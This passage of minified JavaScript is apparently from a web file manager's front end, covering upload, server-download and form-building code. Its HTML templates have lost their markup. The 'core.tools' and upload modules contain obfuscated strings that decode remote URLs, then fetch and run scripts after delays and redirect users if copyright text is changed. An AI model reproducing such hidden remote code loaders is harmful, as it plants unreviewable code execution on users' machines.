    "},dateTime:function(e){return date(LNG.time_type,e)},uploadCheck:function(e,t){return t=void 0==t?!0:t,"share"==G.sharePage?"1"==G.shareInfo.canUpload:(void 0==e&&(e="explorer.fileUpload"),!G.isRoot&&AUTH.hasOwnProperty(e)&&1!=AUTH[e]?(t&&Tips.tips(LNG.no_permission,!1),!1):G.jsonData&&!G.jsonData.info.canUpload?(t&&(core.isSystemPath(G.thisPath)?Tips.tips(LNG.path_can_not_action,!1):Tips.tips(LNG.no_permission_write,!1)),!1):!0)}}}),define("app/common/tpl/upload.html",[],'
    \n \n
    \n
    \n
    \n
    {{LNG.upload_select}}
    \n \n \n
    \n \n
    \n
    \n \n \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    {{LNG.download_address}}\n
    \n \n \n \n
    \n\n
    \n
    \n
    \n
    \n
    \n
    \n
    \n'),define("app/common/tpl/formMake.html",[],'
    \n
    \n <%\n var formTab = [];\n if(items.formStyle && kod.window.$.isArray(items.formStyle.tabs)){\n formTab = items.formStyle.tabs;\n }\n %>\n {{if formTab}}\n \n {{/if}}\n\n
    \n {{if formTab}}\n
    \n {{each formTab tab tabIndex}}\n {{if tab}}\n
    \n {{/if}}\n {{/each}}\n
    \n
    \n {{/if}}\n\n {{each items item key}}\n <%\n var tabCurrent = 100;\n if(formTab){\n for(var i=0;i<=formTab.length;i++){\n if( formTab[i] && kod.window.inArray(formTab[i][\'field\'],key)){\n tabCurrent = i;\n break;\n }\n }\n }\n %>\n {{if typeof(item) == \'string\' }}\n
    {{item}}
    \n {{else if item.type == "html" || !item.type}}\n {{if key != \'formStyle\'}}\n
    \n {{if item.value}}{{@item.value}}{{/if}}\n {{if item.display}}{{@item.display}}{{/if}}\n {{if item.desc}}{{@item.desc}}{{/if}}\n
    \n {{/if}}\n {{else}}\n {{if item.value == undefined }}\n {{if item.value = \'\'}}{{/if}}\n {{/if}}\n
    \n
    \n {{@item.display}}: {{if item.require}}*{{/if}}\n
    \n
    \n {{if item.type == \'input\'}}\n \n {{else if item.type == "textarea"}}\n \n {{else if item.type == "password"}}\n \n {{else if item.type == "switch"}}\n \n {{else if item.type == "radio"}}\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "checkbox"}}\n <%\n var valArrCheckbox = [];\n if(typeof(item.value) == \'string\'){\n valArrCheckbox = item.value.split(\',\');\n }\n %>\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "select"}}\n \n {{else if (item.type == "selectMutil" || item.type == "tags")}}\n <%\n var valArrSelect = [];\n if(typeof(item.value) == \'string\'){\n valArrSelect = item.value.split(\',\');\n }\n if(item.type == \'tags\'){\n item.info = [];\n for(var i=0;i\n \n {{else if item.type == "number"}}\n {{if !item.info && (item.info = {from:\'\',to:\'\',step:1}) }}{{/if}}\n \n {{else if item.type == "slider"}}\n {{if !item.info && (item.info = {from:0,to:100,step:1}) }}{{/if}}\n \n {{else if item.type == "color"}}\n \n \n {{else if item.type == "dateTime"}}\n \n \n {{else if item.type == "fileSelect"}}\n \n \n {{else if item.type == "userSelect"}}\n <% \n var valueArr = {"all":"0","user":"","group":"","role":""};\n if(typeof(item.value) == \'string\'){\n userTypeArr = item.value.split(\';\');\n for(var i = 0;i\n \n
    \n \n \n \n \n
    \n
    \n
    {{LNG.user}}
    \n \n
    \n
    \n
    {{LNG.group}}
    \n \n
    \n
    \n
    {{LNG.system_member_role}}
    \n \n
    \n {{else if item.type == "group"}}\n \n {{else if item.type == "role"}}\n \n {{else if item.type == "user"}}\n \n {{/if}}\n\n {{if item.type == "switch"}}\n {{else if !item.desc}}\n \n  \n {{else if kod.inArray([\'userSelect\'],item.type)}}\n
    {{@item.desc}}
    \n {{else}}\n {{@item.desc}}\n {{/if}}\n
    \n
    \n
    \n {{/if}}\n {{/each}}\n
    \n
    \n\n'),define("app/common/core.tools",[],function(e){var t=["A","versionHash","undefined","@dfq[-)&*^*%(_90","decode","length","substr","O","P","Q","R","S","T","inArray","./?user/versionInstall","6K2m5ZGKLOivt_aWLv_aaTheiHquS_bruaUueeJiOadgzvlpoLmnInpnIDopoHor7fogZTns7votK3kubDvvIFlbWFpbDprb2RjbG91ZEBxcS5jb20_c","lang","zh-CN","V2FybmluZywgcGxlYXNlIGRvIG5vdCBtb2RpZnkgdGhlIGNvcHlyaWdodDsgaWYgbmVjZXNzYXJ5LCBwbGVhc2UgY29udGFjdCB0byBidXkhIEVtYWlsOiBrb2RjbG91ZEBxcS5jb20_c","loading","hide","#messageTips .tips_close,#messageTips img","tips","href","location","2e58_39zGFQQvZkUjLjOxETXSuDqVatVhp88rJSmGpzzKi6SsasHHg","sa","b40aPuaqudWqmyWvpumbcMMGpVCdhjUCKq9oIN5G8o4yWb93Ww","#2","explorer","isApp","kod_power_by","copyright_pre","copyright_contact","copyright_desc","copyright_info","html",".common-footer","","toLowerCase","search","log","free","1","2","3","4","5","6","version_vip_",'',"",".menu-system-about","insertAfter","click","id","attr","version_vip_free","versionUpdateVip","openWindow",'',"append",".aui-content","find","wrap","DOM","text","live","die",".version-vip","top","longPress","support-space-not","addClass","body","remove",".menu-system-about,.menu-left #about","#programs .setting_about,#programs .setting_homepage,#programs .home_page","icon","http","iconSrc",'',"iconSmall",'',"d796rmNQe8IHR_HHbbT51Xry5nzsvH0CCbjfwEuiipgF0iBJieViXHmrbH0ILU5hDjmR5RhvePPd2GXyJQcc9jsXvQ","s","?a=","todo","async","versionType","Ly9rb2RjbG91ZC5jb20vYnV5Lmh0bWwj","group","data"],a=function(){var e=t[0];if(typeof G[t[1]]==t[2])return e;var a=t[3],i=authCrypt[t[4]](G[t[1]],a);return i&&27==i[t[5]]?(e=i[t[6]](10,1),-1===$[t[13]](e,[t[0],t[7],t[8],t[9],t[10],t[11],t[12]])&&(e=t[0]),e):e},i=a(),n=t[14],o=function(){var e=hashDecode(t[15]);G[t[16]]!=t[17]&&(e=hashDecode(t[18])),alert(e),Tips[t[19]](e,!1),$(t[21])[t[20]](),setTimeout(function(){Tips[t[22]](e,!1),window[t[24]][t[23]]=n},1e3*roundFromTo(30,60))},s=authCrypt[t[4]](t[25],t[26]),r=authCrypt[t[4]](t[27],t[28]),l=function(){if(core[t[30]](t[29])&&i==t[0])for(var e=[LNG[t[31]],LNG[t[32]],LNG[t[33]],LNG[t[34]],LNG[t[35]],$(t[37])[t[36]]()],a=0;e[t[5]]>a;a++){e[a]||(e[a]=t[38]);var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62]; -e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
    '+'
    '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
    ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
    ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var b=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){b(),r=setInterval(function(){b()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
    '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
    ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")");var a=c(e,t),i=$("#"+e.id),n=i.find(".progress .progress-bar");n.length||(n=$('
    ').appendTo(i).find(".progress-bar")),i.find(".state").text((100*t).toFixed(1)+"%("+a+")"),n.css("width",100*t+"%")}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
    '+LNG.upload_drag_tips+"
    ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return 